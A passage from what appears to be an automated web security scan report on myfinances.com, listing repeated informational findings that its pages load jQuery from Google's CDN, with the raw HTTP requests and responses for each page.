Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:22 GMT
Content-Length: 13143
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.11. http://www.myfinances.com/blog/3299533.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299533.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3299533.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:44 GMT
Content-Length: 13470
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.12. http://www.myfinances.com/blog/3299543.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299543.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3299543.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:00 GMT
Content-Length: 13443
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.13. http://www.myfinances.com/blog/3299553.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299553.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3299553.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:01 GMT
Content-Length: 13505
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.14. http://www.myfinances.com/budget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /budget.php HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:10 GMT
Content-Length: 21607
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=ddqd7n9uvj64k8219a35nnf334; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.15. http://www.myfinances.com/calculator/2896373.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /calculator/2896373.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /calculator/2896373.html HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:59:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:59:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17086


<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a28
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.16. http://www.myfinances.com/calculator/all.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /calculator/all.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /calculator/all.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:00 GMT
Content-Length: 21329
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.17. http://www.myfinances.com/college_prep.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /college_prep.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /college_prep.html HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:59:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:59:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 8915

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.18. http://www.myfinances.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /contact.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:20 GMT
Content-Length: 8005
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.19. http://www.myfinances.com/credit_coach.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /credit_coach.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /credit_coach.html HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:58:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:58:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 8541

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.20. http://www.myfinances.com/modules/calculators/java/resources/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /modules/calculators/java/resources/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /modules/calculators/java/resources/ HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:00:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:00:51 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.21. http://www.myfinances.com/modules/facebox/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /modules/facebox/images/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /modules/facebox/images/ HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:00:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:00:52 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.22. http://www.myfinances.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /privacy.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:20 GMT
Content-Length: 9598
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.23. http://www.myfinances.com/retirement_pro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /retirement_pro.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /retirement_pro.html HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
